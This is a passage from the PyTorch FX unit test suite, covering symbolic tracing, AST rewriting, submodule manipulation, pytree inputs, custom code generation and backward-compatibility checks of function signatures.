def test_user_friendly_call_provenance_with_module(self):
class M(torch.nn.Module):
def forward(self, x):
return wrapper_fn(x)
traced = torch.fx.symbolic_trace(M())
with self.assertRaisesRegex(RuntimeError, "'wrapper_fn' is "
"being compiled since it was called"
" from 'M.forward'"):
scripted = torch.jit.script(traced)
def test_snake_case(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.activations = torch.nn.ModuleDict([
["snake_case", torch.nn.ReLU()],
["PascalCase", torch.nn.LeakyReLU()],
["ALL_CAPS", torch.nn.PReLU()]
])
def forward(self, x):
a = self.activations["snake_case"](x)
b = self.activations["PascalCase"](x)
c = self.activations["ALL_CAPS"](x)
return a, b, c
traced = symbolic_trace(M())
check = [
("activations_snake_case", "activations.snake_case"),
("activations_pascal_case", "activations.PascalCase"),
("activations_all_caps", "activations.ALL_CAPS")
]
i = 0
for node in traced.graph.nodes:
if node.op == "placeholder" or node.op == "output":
continue
name = check[i][0]
target = check[i][1]
self.assertEqual(name, node.name)
self.assertEqual(target, node.target)
i += 1
self.assertEqual(i, 3)
def test_no_mutation(self):
from torch.fx.immutable_collections import immutable_list
x = immutable_list([3, 4])
with self.assertRaisesRegex(NotImplementedError, "new_args"):
x[0] = 4
def test_partial_trace(self):
class Foo(torch.nn.Module):
def forward(self, x, y):
if y:
return 2 * x
else:
return x
mod = Foo()
mod_true = symbolic_trace(mod, concrete_args={'y': True})
mod_false = symbolic_trace(mod, concrete_args={'y': False})
self.assertEqual(mod_true(3, True), 6)
print(mod_true.code)
assert(any([i.target == torch._assert for i in mod_true.graph.nodes]))
with self.assertRaises(AssertionError):
mod_true(3, False)
self.assertEqual(mod_false(3, False), 3)
with self.assertRaises(AssertionError):
mod_false(3, True)
def f_higher(a, f):
return f(a)
nf = symbolic_trace(f_higher, concrete_args={'f': lambda x: x * 2})
self.assertEqual(nf(3, lambda x: x * 2), 6)
def test_custom_traceback_raised_when_exception_source_is_graphmodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.W = torch.nn.Parameter(torch.randn(5))
def forward(self, x):
return torch.dot(self.W, x)
traced = torch.fx.symbolic_trace(M())
out = [n for n in traced.graph.nodes if n.op == "output"][-1]
with traced.graph.inserting_before(out):
relu_out = traced.graph.call_method(method_name='relu',
args=(out.args[0],))
out.args = (relu_out,)
traced.recompile()
with self.capture_stderr() as captured:
with self.assertRaises(TypeError):
traced(5)
self.assertRegex(captured[0],
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_custom_traceback_not_raised_when_exception_source_is_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(3, 4)
def forward(self, x):
return self.linear(x)
traced = torch.fx.symbolic_trace(M())
# Do not change this to `capture_stderr` or another context
# manager without ensuring that the output is as expected
try:
traced(torch.rand(5, 5))
except RuntimeError:
captured = traceback.format_exc()
self.assertNotRegex(captured,
r"Call using an FX-traced Module, line .* of the "
r"traced Module's generated forward function:")
def test_graph_module_replicate_for_dp(self):
class Foo(torch.nn.Module):
def forward(self, x):
return torch.relu(x)
gm = torch.fx.symbolic_trace(Foo())
x = torch.randn(5, 3)
out = gm(x)
replica = gm._replicate_for_data_parallel()
out_replica = replica(x)
torch.testing.assert_allclose(out_replica, out)
def test_ast_rewriter_rewrites_assert(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_rewrites_assert_with_message(self):
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, y: int, z: int):
assert y == z, "msg"
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_throw_out_variant(self):
def foo(x):
y = torch.rand_like(x)
torch.sigmoid(x, out=y)
return y
class MyTracer(torch.fx.Tracer):
check_mutable_operations = True
tracer = MyTracer()
with self.assertRaisesRegex(RuntimeError, 'mutable operation aten::sigmoid.out'):
traced_graph = tracer.trace(foo)
def test_ast_rewriter_reassigns_submodules(self):
class M(torch.nn.Module):
def __init__(self):
super().__init__()
self.bn = torch.nn.BatchNorm2d(100)
def forward(self, x: torch.Tensor):
return torch.add(x, x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
traced.graph.lint()
def test_ast_rewriter_wrap(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf((4, y), 3)
+ a_lifted_leaf((3, 4), 5)
+ a_lifted_leaf((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf, real_a_lifed_leaf)
def test_ast_rewriter_wrap_fn_directly(self):
self.assertEqual(3 + 4 + 5, a_lifted_leaf2((3, 4), 5))
def to_trace(y):
return (
a_lifted_leaf2((4, y), 3)
+ a_lifted_leaf2((3, 4), 5)
+ a_lifted_leaf2((y, y), y)
)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("a_lifted_leaf2", traced.code)
self.assertEqual(27, traced(2))
self.assertIs(a_lifted_leaf2, real_a_lifed_leaf2)
def test_profiler_ranges_side_effect(self):
g = torch.fx.Graph()
handle = g.call_function(torch.ops.profiler._record_function_enter, ('test_range',))
g.call_function(torch.ops.profiler._record_function_exit, (handle,))
g.output(None)
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
g.eliminate_dead_code()
found_targets = {}
for node in g.nodes:
if node.op == 'call_function':
found_targets.setdefault(node.target)
self.assertEqual(
list(found_targets.keys()),
[torch.ops.profiler._record_function_enter, torch.ops.profiler._record_function_exit]
)
def test_ast_rewriter_wrapped_via_decorator(self):
class F(torch.nn.Module):
def forward(self, x):
return wrapped_via_decorator(x)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(F())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrapped_via_decorator_and_transformed(self):
self.assertEqual(wrapped_via_decorator(0), 1)
def to_trace(y):
return wrapped_via_decorator(y)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(to_trace)
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_via_decorator", traced.code)
self.assertEqual(traced(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
transformed = torch.fx.Transformer(traced).transform()
self.assertIn("wrapped_via_decorator", transformed.code)
self.assertEqual(transformed(0), 1)
self.assertIs(wrapped_via_decorator, real_wrapped_via_decorator)
self.assertFalse(hasattr(wrapped_via_decorator, "__fx_already_patched"))
def test_ast_rewriter_wrap_with_submodule(self):
class M(torch.nn.Module):
def __init__(self):
super(M, self).__init__()
self.batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
def forward(self, x: torch.Tensor):
return wrapped_with_submodule(x, self.batchnorm1d)
ast_rewriter = RewritingTracer()
graph = ast_rewriter.trace(M())
traced = GraphModule(ast_rewriter.root, graph, "gm")
self.assertIn("wrapped_with_submodule", traced.code)
input = torch.rand(3, 2)
ref_batchnorm1d = torch.nn.BatchNorm1d(2, affine=False)
self.assertEqual(ref_batchnorm1d(input), traced(input))
def test_submodule_manipulation_API(self):
class C(torch.nn.Module):
def __init__(self):
super(C, self).__init__()
self.conv = torch.nn.Conv2d(16, 33, 3, stride=2)
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.conv(torch.cat([self.param, x]))
class B(torch.nn.Module):
def __init__(self):
super(B, self).__init__()
self.linear = torch.nn.Linear(100, 200)
self.register_buffer("buf", torch.randn(2, 3))
self.net_c = C()
def forward(self, x):
return self.linear(torch.cat([self.buf, self.net_c(x)]))
class A(torch.nn.Module):
def __init__(self):
super(A, self).__init__()
self.net_b = B()
self.param = torch.nn.Parameter(torch.rand(2, 3))
def forward(self, x):
return self.net_b(x) + self.param
a = symbolic_trace(A())
a.add_submodule("net_b.net_c.dropout", torch.nn.Dropout(p=0.2))
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"][-1]
with a.graph.inserting_before(conv):
with warnings.catch_warnings(record=True) as w:
dropout = a.graph.call_module(module_name="net_b.net_c.dropout",
args=conv.args)
self.assertEqual(len(w), 0)
conv.replace_all_uses_with(dropout)
a.graph.erase_node(conv)
a.recompile()
def module_exists(gm: GraphModule, path: str) -> bool:
return any(path == name for name, _ in gm.named_modules())
def parameter_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_parameters())
and any(path == name for name in gm.state_dict().keys()))
def buffer_exists(gm: GraphModule, path: str) -> bool:
return (any(path == name for name, _ in gm.named_buffers())
and any(path == name for name in gm.state_dict().keys()))
# Test that we added the "dropout" submodule
self.assertTrue(module_exists(a, "net_b.net_c.dropout"))
# Test `get_submodule` with an added submodule
self.assertIsNotNone(a.get_submodule("net_b.net_c.dropout"))
# Test that the "conv" submodule is still there
self.assertTrue(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with an original module
self.assertIsNotNone(a.get_submodule("net_b.net_c.conv"))
# Test that the "conv" node is NOT still there
conv = [n for n in a.graph.nodes if n.target == "net_b.net_c.conv"]
self.assertEqual(conv, [])
a.delete_submodule("net_b.net_c.conv")
# Test that the "conv" submodule is now gone
self.assertFalse(module_exists(a, "net_b.net_c.conv"))
# Test `get_submodule` with a deleted submodule
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`conv`"):
self.assertIsNone(a.get_submodule("net_b.net_c.conv"))
# Test `get_attr` warnings
cat = [n for n in a.graph.nodes if n.target == torch.cat][-1]
with a.graph.inserting_before(cat):
with warnings.catch_warnings(record=True) as w:
param = a.graph.get_attr(qualified_name="net_b.net_c.param")
self.assertEqual(len(w), 0)
with self.assertWarnsRegex(UserWarning, "Attempted to "
"insert a get_attr Node with no "
"underlying reference in the "
"owning GraphModule"):
bad_param = a.graph.get_attr(qualified_name="net_b.param")
a.graph.erase_node(bad_param)
cat.args = (*cat.args, param)
a.recompile()
a.graph.lint()
# Test `get_parameter`
a.get_parameter("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "is not an "
"nn.Parameter"):
a.get_parameter("net_b.buf")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`param`"):
a.get_parameter("net_b.param")
# Test `get_buffer`
a.get_buffer("net_b.buf")
with self.assertRaisesRegex(AttributeError, "is not a "
"buffer"):
a.get_buffer("net_b.net_c.param")
with self.assertRaisesRegex(AttributeError, "has no attribute "
"`buf`"):
a.get_buffer("net_b.net_c.buf")
# Test non-nested attributes
a.get_submodule("")
a.get_parameter("param")
# Insert some unused submodules
a.add_submodule("net_b.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.embedding", torch.nn.Embedding(10, 3))
a.add_submodule("net_b.net_c.rnn", torch.nn.RNN(10, 20, 2))
a.add_submodule("batch_norm_2d", torch.nn.BatchNorm2d(100))
# Garbage collection
a.delete_all_unused_submodules()
# Test that all the unused submodules are gone
self.assertFalse(module_exists(a, "net_b.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.embedding"))
self.assertFalse(module_exists(a, "net_b.net_c.rnn"))
self.assertFalse(module_exists(a, "batch_norm_2d"))
# Test that we didn't delete any unused Parameters or buffers
self.assertTrue(parameter_exists(a, "net_b.net_c.param"))
self.assertTrue(buffer_exists(a, "net_b.buf"))
a.graph.lint()
def test_delete_unused_submodules_leaf(self):
class SubModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.linear = torch.nn.Linear(10, 10)
self.relu = torch.nn.ReLU()
def forward(self, x):
x = self.linear(x)
x = self.relu(x)
return x
class Model(torch.nn.Module):
def __init__(self):
super().__init__()
self.submod = SubModule()
def forward(self, x):
x = self.submod(x)
return x
model = Model()
class MyCustomTracer(torch.fx.Tracer):
def is_leaf_module(self, m: torch.nn.Module, module_qualified_name : str) -> bool:
return module_qualified_name == "submod"
inputs = torch.randn(1, 10)
traced_graph = MyCustomTracer().trace(model)
gm2 = torch.fx.GraphModule(model, traced_graph)
gm2.delete_all_unused_submodules()
torch.testing.assert_allclose(gm2(inputs), model(inputs))
def test_tracing_graphmodules_as_leaf_submodules(self):
class A(torch.nn.Module):
def forward(self, t):
return t + t
class B(torch.nn.Module):
def __init__(self):
super(type(self), self).__init__()
self.calling = False
self.called = False
def forward(self, t):
if self.calling:
return t - t
else:
return t + t
def __call__(self, *args):
self.called = True
self.calling = True
return super(type(self), self).__call__(*args)
self.calling = False
class M(torch.nn.Module):
def __init__(self, a, b):
super().__init__()
self.a = a
self.b = b
def forward(self, t):
x = self.a(t)
y = self.b(t)
return x + y
class LeafTracer(Tracer):
def is_leaf_module(self, module, name):
return True
class LeafTracerNotB(Tracer):
def is_leaf_module(self, module, name):
return False if "b" in name else True
# Recompile calls added "for fun", since they
# chain __call__ wrappers.
#
# Test: B as a regular, non-leaf module
#
a = symbolic_trace(A())
a.recompile()
m = M(a, B())
graph = LeafTracerNotB().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is not treated as leaf.
self.assertFalse(hasattr(gm, "b"))
# Test assert custom __call__ on submodule b was honored.
match = [
n
for n in gm.graph.nodes
if n.op == "call_function" and n.target == operator.sub
]
self.assertTrue(len(match) == 1)
#
# Test: B as a regular, leaf module
# symbolic_trace should only patch torch.nn.Module.__call__,
# which means B.__call__ should still execute
#
a = symbolic_trace(A())
a.recompile()
b = B()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
# Test graphmodule/submodule a is not inlined.
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
# Test submodule b is leaf:
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
# Test b.__call__ was run
self.assertTrue(b.called)
self.assertTrue(gm.get_submodule("b").called)
#
# Test: B as GraphModule leaf
# __call__ not honored since symbolic_trace directly invokes forward()
#
a = symbolic_trace(A())
a.recompile()
b = symbolic_trace(B())
b.recompile()
m = M(a, b)
graph = LeafTracer().trace(m)
gm = GraphModule(m, graph)
gm.recompile()
self.assertTrue(isinstance(gm.get_submodule("a"), GraphModule))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "a"]
self.assertTrue(len(match) == 1)
self.assertTrue(isinstance(gm.get_submodule("b"), torch.nn.Module))
match = [n for n in gm.graph.nodes if n.op == "call_module" and n.target == "b"]
self.assertTrue(len(match) == 1)
def _test_graph_module_init_buffer_param_copied(self, use_dict_init: bool):
class MyModule(torch.nn.Module):
def __init__(self):
super().__init__()
self.register_buffer("my_buff", torch.rand(3, 4))
self.register_parameter(
"my_param", torch.nn.Parameter(torch.rand(3, 4))
)
def forward(self, x):
return x + self.my_buff + self.my_param
mod = MyModule()
mod_traced = symbolic_trace(mod)
# Create new GraphModule based on original, either w/ dict or root module.
orig_buff = mod_traced.get_buffer("my_buff")
orig_param = mod_traced.get_parameter("my_param")
mod_traced_new = GraphModule(
{"my_buff": orig_buff, "my_param": orig_param} if use_dict_init else mod,
mod_traced.graph,
)
# Check that both my_buff and my_param are found and the same.
try:
new_buff = mod_traced_new.get_buffer("my_buff")
except Exception:
self.fail("Did not find my_buff")
self.assertEqual(orig_buff, new_buff)
try:
new_param = mod_traced_new.get_parameter("my_param")
except Exception:
self.fail("Did not find my_param")
self.assertEqual(orig_param, new_param)
x = torch.rand(3, 4)
orig_out = mod_traced(x)
submodules_out = mod_traced_new(x)
self.assertEqual(orig_out, submodules_out)
def test_graph_module_init_buffer_param_copied_dict_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=True)
def test_graph_module_init_buffer_param_copied_mod_init(self):
self._test_graph_module_init_buffer_param_copied(use_dict_init=False)
def test_annotations_with_no_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: torch.Tensor, a: A) -> torch.Tensor:
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: 'torch.Tensor', a: 'A') -> 'torch.Tensor':
return a(x)
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_no_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List[torch.Tensor], a: A) -> torch.Tensor:
return a(x[0])
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
def test_annotations_with_non_torch_reference_and_internal_forward_references(self):
class A:
def __call__(self, x: torch.Tensor):
return torch.add(x, x)
class M(torch.nn.Module):
def forward(self, x: List['torch.Tensor'], a: A) -> 'torch.Tensor':
return a(x)[0]
self.checkGraphModule(M(), (torch.rand(2, 3), A()), kwargs=None)
@unittest.skipIf(sys.version_info < (3, 7), "`__future__` feature "
"`annotations` is not defined in Python <3.7")
def test_annotation_with_future(self):
try:
import fx.test_future # noqa: F401
finally:
del sys.modules["__future__"]
def test_annotations_empty_tuple(self):
class Foo(torch.nn.Module):
def forward(self, x: Tuple[()], y: Tuple[str, Tuple[()]]):
return "foo"
traced = torch.fx.symbolic_trace(Foo())
x = ()
y = ("bar", ())
traced(x, y)
FileCheck().check("_Tuple[()]") \
.check("typing_Tuple[str,typing_Tuple[()]]") \
.run(traced.code)
scripted = torch.jit.script(traced)
scripted(x, y)
FileCheck().check("Tuple[()]") \
.check("Tuple[str, Tuple[()]]") \
.run(scripted.code)
@unittest.skipIf(IS_WINDOWS, "Python Windows bug? https://bugs.python.org/issue45108")
def test_assert(self):
def f(x):
assert x > 1
return x + 1
try:
torch.fx.proxy.TracerBase.trace_asserts = True
traced = symbolic_trace(f)
finally:
torch.fx.proxy.TracerBase.trace_asserts = False
self.assertEqual(f(2), traced(2))
with self.assertRaises(AssertionError):
traced(0)
def test_pytree(self):
def f_sum(x):
return sum(x)
def f_sum_dict(x):
out = 0
for k, v in x.items():
out += v
return out
def f_dict_list_map(x):
new_dict = {}
for k, v in x.items():
new_dict[k] = [i + 1 for i in v]
return new_dict
def f_dict_add(x):
return x['a'] + sum(x['z'])
def f_namedtuple_add(x):
return x.x + x.y
pytree._register_pytree_node(
Foo,
lambda x: ([x.a, x.b], None),
lambda x, _: Foo(x[0], x[1]),
)
fx_pytree.register_pytree_flatten_spec(Foo, lambda x, _: [x.a, x.b])
def f_custom(x):
return x.a + x.b
def f_custom_dict(x):
return f_sum_dict(x.a) + x.b
def f_return_custom(x):
return Foo(x.b, x.a)
tests = [
(f_sum, [PH, PH, PH]),
(f_sum, []),
(f_sum_dict, {'a': PH, 'b': PH, 'c': PH}),
(f_dict_list_map, {'a': (PH, PH), 'b': [PH], 'c': []}),
(f_dict_list_map, {5: (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': (PH, PH, PH)}),
(f_dict_add, {'a': PH, 'z': []}),
(f_custom, Foo(PH, PH)),
(f_custom, Foo(PH, 3)),
(f_custom_dict, Foo({'a': PH, 'b': PH}, PH)),
# (f_return_custom, Foo(PH, PH)), # Don't currently support output pytrees
(f_namedtuple_add, Point(PH, PH)),
]
def verify_pytree(f, inp):
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
num_flat_args = len([i == PH for i in pytree.tree_flatten(inp)[0]])
orig_out = f(val)
nf = symbolic_trace(f, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(val))), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
nf = symbolic_trace(nf)
self.assertEqual(nf(val), orig_out)
assert "tree_flatten_spec" not in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == 1)
nf = symbolic_trace(nf, concrete_args={'x': inp})
self.assertEqual(nf(val), orig_out)
assert num_flat_args == 0 or "tree_flatten_spec" in nf.code
assert(sum([i.op == 'placeholder' for i in nf.graph.nodes]) == num_flat_args)
pickled = pickle.dumps(nf)
nf = pickle.loads(pickled)
self.assertEqual(nf(val), orig_out)
for f, inp in tests:
verify_pytree(f, inp)
def test_pytree_concrete(self):
def f(b, a):
if b:
return a['a']
else:
return a['z']
inp = {'a': {'a': PH, 'z': PH}, 'b': True}
nf = symbolic_trace(f, concrete_args=inp)
val = pytree.tree_map(lambda x: torch.randn(3) if x == PH else x, inp)
self.assertEqual(nf(**val), f(**val))
nf = symbolic_trace(nf)
self.assertEqual(nf(**val), f(**val))
def test_custom_codegen(self):
class ListCodeGen(CodeGen):
def gen_fn_def(self, free_vars, maybe_return_annotation):
lst_unpack = f"""
def forward(self, args_list: List[torch.Tensor]){maybe_return_annotation}:
{', '.join(free_vars)} = args_list"""
return lst_unpack
def additional_globals(self):
return [('List', typing.List)]
def process_inputs(self, *inputs):
assert(len(inputs) == 1)
return inputs[0]
def f(a, b):
return a + b
nf = symbolic_trace(f)
vals = [torch.randn(3), torch.randn(3)]
self.assertEqual(nf(*vals), f(*vals))
nf.graph.set_codegen(ListCodeGen())
nf.recompile()
bare_fx = GraphModule({}, copy.deepcopy(nf.graph))
bare_fx.graph.set_codegen(CodeGen())
bare_fx.recompile()
self.assertEqual(nf(vals), f(*vals))
self.assertEqual(nf.graph.process_outputs(bare_fx(*nf.graph.process_inputs(vals))), f(*vals))
ts_f = torch.jit.script(nf)
self.assertEqual(nf(vals), ts_f(vals))
def test_imul_code_print(self):
graph = torch.fx.Graph()
a = graph.placeholder("a")
b = graph.placeholder("b")
graph.call_function(operator.imul, (a, b), {})
graph.output(a)
gm = torch.fx.GraphModule({}, graph)
gm.recompile()
self.assertEqual(gm(2, 3), 6)
self.assertIn("a *= b", gm.code)
def run_getitem_target():
from torch.fx._symbolic_trace import _wrapped_methods_to_patch
_wrapped_methods_to_patch.append((torch.Tensor, "__getitem__"))
try:
TestFX().getitem_inner()
finally:
_wrapped_methods_to_patch.pop()
class TestOperatorSignatures(JitTestCase):
def setUp(self):
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
@onlyCPU
@ops(op_db, allowed_dtypes=(torch.float,))
def test_get_torch_func_signature_exhaustive(self, device, dtype, op):
if not isinstance(op.op, types.BuiltinFunctionType):
raise unittest.SkipTest("This path doesn't work on Python functions")
sample_inputs_itr = op.sample_inputs(device, dtype, requires_grad=False)
schemas = get_signature_for_torch_op(op.op)
if not schemas:
raise RuntimeError('No Schemas Returned')
for sample_input in sample_inputs_itr:
# Iterate through overloads until we hit a match. If we exit this
# loop via `else`, we haven't found a match
for schema in schemas:
try:
bound_args = schema.bind(sample_input.input, *sample_input.args, **sample_input.kwargs)
bound_args.apply_defaults()
op(*bound_args.args, **bound_args.kwargs)
break
except TypeError as e:
pass
else:
raise RuntimeError(f'Did not match any schemas for op {op.name}!')
class TestFXAPIBackwardCompatibility(JitTestCase):
def setUp(self):
self.maxDiff = None
# Checking for mutable operations whil tracing is feature flagged
# Enable it in testing but not by default
self.orig_tracer_mutable_flag = torch.fx.proxy.TracerBase.check_mutable_operations
torch.fx.proxy.TracerBase.check_mutable_operations = True
def tearDown(self):
torch.fx.proxy.TracerBase.check_mutable_operations = self.orig_tracer_mutable_flag
def _fn_to_stable_annotation_str(self, obj):
"""
Unfortunately we have to serialize function signatures manually since
serialization for `inspect.Signature` objects is not stable across
python versions
"""
fn_name = torch.typename(obj)
signature = inspect.signature(obj)
sig_str = f'{fn_name}{signature}'
arg_strs = []
for k, v in signature.parameters.items():
maybe_type_annotation = f': {self._annotation_type_to_stable_str(v.annotation, sig_str)}'\
if v.annotation is not inspect.Signature.empty else ''
def default_val_str(val):
if isinstance(val, (tuple, list)):
str_pieces = ['(' if isinstance(val, tuple) else '[']
str_pieces.append(', '.join(default_val_str(v) for v in val))
if isinstance(val, tuple) and len(str_pieces) == 2:
str_pieces.append(',')
str_pieces.append(')' if isinstance(val, tuple) else ']')
return ''.join(str_pieces)
# Need to fix up some default value strings.
# First case: modules. Default module `repr` contains the FS path of the module.
# Don't leak that
if isinstance(val, types.ModuleType):
return f'<module {val.__name__}>'
# Second case: callables. Callables (such as lambdas) encode their address in
# their string repr. Don't do that
if callable(val):
return f'<function {val.__name__}>'
return str(val)
if v.default is not inspect.Signature.empty:
default_val_str = default_val_str(v.default) if not isinstance(v.default, str) else f"'{v.default}'"
maybe_default = f' = {default_val_str}'
else:
maybe_default = ''
maybe_stars = ''
if v.kind == inspect.Parameter.VAR_POSITIONAL:
maybe_stars = '*'
elif v.kind == inspect.Parameter.VAR_KEYWORD:
maybe_stars = '**'
arg_strs.append(f'{maybe_stars}{k}{maybe_type_annotation}{maybe_default}')
return_annot = f' -> {self._annotation_type_to_stable_str(signature.return_annotation, sig_str)}'\
if signature.return_annotation is not inspect.Signature.empty else ''
return f'{fn_name}({", ".join(arg_strs)}){return_annot}'
def _annotation_type_to_stable_str(self, t, sig_str):
if t is inspect.Signature.empty:
return ''
# Forward ref
if isinstance(t, str):
return f"'{t}'"
if hasattr(typing, 'ForwardRef') and isinstance(t, typing.ForwardRef):
return t.__forward_arg__
if hasattr(typing, '_ForwardRef') and isinstance(t, typing._ForwardRef):
return t.__forward_arg__
trivial_mappings = {
str : 'str',
int : 'int',
float: 'float',
bool: 'bool',
torch.dtype: 'torch.dtype',
torch.Tensor: 'torch.Tensor',
torch.device: 'torch.device',
torch.memory_format: 'torch.memory_format',
slice: 'slice',
torch.nn.Module: 'torch.nn.modules.module.Module',
torch.fx.Graph : 'torch.fx.graph.Graph',
torch.fx.Node : 'torch.fx.node.Node',
torch.fx.Proxy : 'torch.fx.proxy.Proxy',
torch.fx.node.Target : 'torch.fx.node.Target',
torch.fx.node.Argument : 'torch.fx.node.Argument',
torch.fx.graph.PythonCode : 'torch.fx.graph.PythonCode',
torch.fx.graph_module.GraphModule: 'torch.fx.graph_module.GraphModule',
torch.fx.subgraph_rewriter.Match: 'torch.fx.subgraph_rewriter.Match',
Ellipsis : '...',
typing.Any: 'Any',
type(None): 'NoneType',
None: 'None',
typing.Iterator: 'Iterator',
}
mapping = trivial_mappings.get(t, None)
if mapping:
return mapping
# Handle types with contained types
contained = getattr(t, '__args__', None) or []
# Callables contain a bare List for arguments
contained = t if isinstance(t, list) else contained
# Python 3.8 puts type vars into __args__ for unbound types such as Dict
if all(isinstance(ct, typing.TypeVar) for ct in contained):
contained = []
contained_type_annots = [self._annotation_type_to_stable_str(ct, sig_str) for ct in contained]
contained_type_str = f'[{", ".join(contained_type_annots)}]' if len(contained_type_annots) > 0 else ''
origin = getattr(t, '__origin__', None)
if origin is None:
# Unbound types don't have `__origin__` in some Python versions, so fix that up here.
origin = t if t in {typing.Tuple, typing.Union, typing.Dict, typing.List, typing.Type, typing.Callable} else origin
if origin in {tuple, typing.Tuple}:
return f'Tuple{contained_type_str}'
if origin in {typing.Union}:
# Annoying hack to detect Optional
if len(contained) == 2 and (contained[0] is type(None)) ^ (contained[1] is type(None)):
not_none_param = contained[0] if contained[0] is not type(None) else contained[1]
return f'Optional[{self._annotation_type_to_stable_str(not_none_param, sig_str)}]'
return f'Union{contained_type_str}'
if origin in {dict, typing.Dict}:
return f'Dict{contained_type_str}'
if origin in {list, typing.List}:
return f'List{contained_type_str}'
if origin in {type, typing.Type}:
return f'Type{contained_type_str}'
if isinstance(t, typing.Callable):
if len(contained) > 0 and contained[0] is not Ellipsis:
return f'Callable[[{", ".join(contained_type_annots[:-1])}], {contained_type_annots[-1]}]'
else:
return f'Callable{contained_type_str}'
raise RuntimeError(f'Unrecognized type {t} used in BC-compatible type signature {sig_str}.'
f'Please add support for this type and confirm with the '
f'FX team that your signature change is valid.')
def test_function_back_compat(self):
"""
Test backward compatibility for function signatures with
@compatibility(is_backward_compatible=True). Currently this checks for
exact signature matches, which may lead to false positives. If this
becomes too annoying, we can refine this check to actually parse out
the saved schema strings and check if the change is truly backward-
incompatible.
"""
signature_strs = []
for obj in _BACK_COMPAT_OBJECTS:
if not isinstance(obj, type):
